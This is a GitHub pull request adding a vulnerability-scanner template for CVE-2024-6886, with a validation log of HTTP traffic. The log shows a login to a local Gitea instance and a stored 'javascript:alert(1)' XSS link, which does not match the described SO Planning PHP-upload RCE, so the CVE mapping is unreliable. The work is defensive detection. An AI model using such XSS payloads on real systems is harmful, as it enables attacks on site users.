Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Create CVE-2024-6886 #11534

Merged
merged 2 commits into from
Jan 30, 2025
Merged

Create CVE-2024-6886 #11534

merged 2 commits into from
Jan 30, 2025

Conversation

soonghee2
Copy link
Contributor

Template / PR Information

Added CVE-2024-6886

An authenticated Remote Code Execution (RCE) vulnerability is found in the SO Planning online planning tool. If the public view setting is enabled, a attacker can upload a PHP-file that will be available for execution for a few milliseconds before it is removed, leading to execution of code on the underlying system. The vulnerability has been remediated in version 1.52.02.

Template Validation

I've validated this template locally?

  • YES
  • NO
POST /user/login HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Connection: close
Content-Length: 35
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

user_name=user3&password=user3user3
[�[34mVER�[0m] [CVE-2024-6886] Sent HTTP request to http://localhost:3000/user/login
[�[35mDBG�[0m] [CVE-2024-6886] Dumped HTTP response http://localhost:3000/user/login

HTTP/1.1 303 See Other
Connection: close
Content-Length: 0
Cache-Control: max-age=0, private, must-revalidate, no-transform
Date: Sat, 25 Jan 2025 13:25:51 GMT
Location: /
Set-Cookie: i_like_gitea=25d77704be04d6ab; Path=/; HttpOnly; SameSite=Lax
Set-Cookie: _csrf=GBSnYj265488F9fTPLfq7aUOzFs6MTczNzgxMTU1MTg4MjExMzI2OA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
Set-Cookie: i_like_gitea=4d74d1b154f6011b; Path=/; HttpOnly; SameSite=Lax
Set-Cookie: lang=en-US; Path=/; HttpOnly; SameSite=Lax
Set-Cookie: _csrf=; Path=/; Max-Age=0; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN

[�[34mINF�[0m] [CVE-2024-6886] Dumped HTTP request for http://localhost:3000/

GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Cookie: i_like_gitea=4d74d1b154f6011b; lang=en-US
Accept-Encoding: gzip

[�[34mVER�[0m] [CVE-2024-6886] Sent HTTP request to http://localhost:3000/
[�[35mDBG�[0m] [CVE-2024-6886] Dumped HTTP response http://localhost:3000/


HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: max-age=0, private, must-revalidate, no-transform
Content-Type: text/html; charset=utf-8
Date: Sat, 25 Jan 2025 13:25:52 GMT
X-Frame-Options: SAMEORIGIN
...
...
....
				
					<div class="flex-item-body"><a href="javascript:alert(1)">XSS test2s7fQJk7ykXnuNjD9S0a5B6bmAj</a></div>
				
			

[�[92mCVE-2024-6886�[0m:�[1;92mword-1�[0m] [�[94mhttp�[0m] [�[38;5;208mhigh�[0m] http://localhost:3000/user3

image

@soonghee2
Create CVE-2024-6886
37d8a20 
An authenticated Remote Code Execution (RCE) vulnerability is found in the SO Planning online planning tool. If the public view setting is enabled, a attacker can upload a PHP-file that will be available for execution for a few milliseconds before it is removed, leading to execution of code on the underlying system. The vulnerability has been remediated in version 1.52.02.
@GeorginaReeder
Copy link

Thanks for your contribution @soonghee2 ! :)

@ritikchaddha ritikchaddha self-assigned this Jan 30, 2025
@ritikchaddha ritikchaddha added the Done Ready to merge label Jan 30, 2025
@DhiyaneshGeek DhiyaneshGeek merged commit b05b572 into projectdiscovery:main Jan 30, 2025
3 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@DhiyaneshGeek DhiyaneshGeek DhiyaneshGeek approved these changes

Assignees

@ritikchaddha ritikchaddha

Labels
Done Ready to merge
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@soonghee2 @GeorginaReeder @DhiyaneshGeek @ritikchaddha